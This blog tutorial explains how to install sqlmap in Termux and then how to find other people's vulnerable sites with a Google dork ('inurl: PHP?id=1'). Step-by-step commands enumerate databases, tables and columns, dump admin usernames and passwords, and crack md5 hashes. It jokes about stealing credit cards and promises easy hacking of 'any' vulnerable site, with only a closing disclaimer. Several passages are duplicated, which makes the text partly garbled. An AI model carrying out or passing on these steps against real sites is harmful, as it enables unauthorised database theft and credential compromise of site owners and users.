In this article, I am going to show you how to install and use SQLMAP in Termux. First of all, SQLMAP is an open-source tool that automatically detects and exploits SQL injection bugs. By doing a SQL injection attack, an attacker can take over and manipulate a database on a server.
So from that, we can steal or retrieve a database from a website that we want For example, we can retrieve website admin id and password from the database.
And if you are lucky, you can get a CC (Credit Card/credit card) for those who like carding, can dump cc here just joking ok. Don't do any illegal activity with SQLMAP.😂😂
Ok now let's get started
Things needed:
- An android device with android version 5.0 or up.
- Termux application: Download.
- Good internet connection.
If you downloaded the Termux launch the Termux app.
First We are going to update the package list with the command:
apt update
Now we have to install Python with the following command:
apt install python python2
Wait until python is installed. After installing python we will install git. Git will help you to clone the package.
apt install git
After installing git we are going to clone the SQLMAP package into our directory with the help of the git command.
git clone https://github.com/sqlmapproject/sqlmap
Wait for the process to be finished. As the process is finished now we need to enter the tool directory with the following command.
cd sqlmap
Now we need to give them permission to read-write and execute the SQLMAP python file by using the command:
chmod +x sqlmap.py
After that, you need to run the following command to run the SQLMAP
python2 sqlmap.py
Now SQLMAP is successfully installed on your Termux.
If you want to run SQLMAP again next time then you need to launch the Termux then you need to enter the directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.
Related Article - Best Hacking Tools and Software
Now let's see how to hack the website using SQLMAP
First, let me tell you. You can hack the websites that have SQL injection vulnerability.
Now you might be thinking about how to find a website that has SQL injection vulnerability.
You can use google dorks to find out SQL injection vulnerability in the website.
Most of the website have SQL injection vulnerability start with PHP?id=1 or any kind of value which is present after PHP?id=
To find the vulnerable websites you can use this google dork inurl: PHP?id=1 or any value after PHP?id=
You can find more information about Google dorks here: Google hacking
Type the following command:
This command will help you to find out the database of the website
python2 sqlmap.py -u <your website> --dbs
If the website is vulnerable then you will found the output similar to this:
*Information_schema
*Database
Now our next step is to find tables that are present in the database with the following command
python2 sqlmap.py -u <your website> –D Database –tables
The above command tells Sqlmap to find out tables that are present under the database.
Note: You will see information schema don't waste your time in finding credentials or any juicy information in that schema because information schema is of no use.
After running the above command you will see tables something like this.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin --columns
The above command tells Sqlmap to find out columns under the table admin.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin --columns
The above command tells Sqlmap to find out columns under the table admin.
Now let's move on to our final command.
For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
The above command will save the username and password in the text format on your device.
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later
Note: Remove <your website> with the URL of the website that you want to hack make sure the website URL must end with PHP?id= 1 or any value after it. If you give a simple URL without PHP?id= then the SQLMAP will not work.
Darkhackerworld or the author of Darkhackerworld is not responsible for any illegal activity done with this information. This article is for educational purposes only. Use this information to find the vulnerability in your own website. Don't use this information to hack another website. Website hacking without the written permission of the website owner is illegal. And you can be in trouble if you are hacking the website without the written permission of the website owner.
Related Article:
Install Metasploit in Termux
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later
Note: Remove <your website> with the URL of the website that you want to hack make sure the website URL must end with PHP?id= 1 or any value after it. If you give a simple URL without PHP?id= then the SQLMAP will not work.
Darkhackerworld or the author of Darkhackerworld is not responsible for any illegal activity done with this information. This article is for educational purposes only. Use this information to find the vulnerability in your own website. Don't use this information to hack another website. Website hacking without the written permission of the website owner is illegal. And you can be in trouble if you are hacking the website without the written permission of the website owner.
Related Article:
Install Metasploit in Termux
Conclusion
In this article, we learn how to install SQLMAP in Termux and how to hack website using SQLMAP.There are millions of website available on the internet which have SQL injection vulnerability. This Vulnerability is caused by a lack of knowledge of website developers. To overcome this vulnerability some developers must know how to be safe from SQL injection.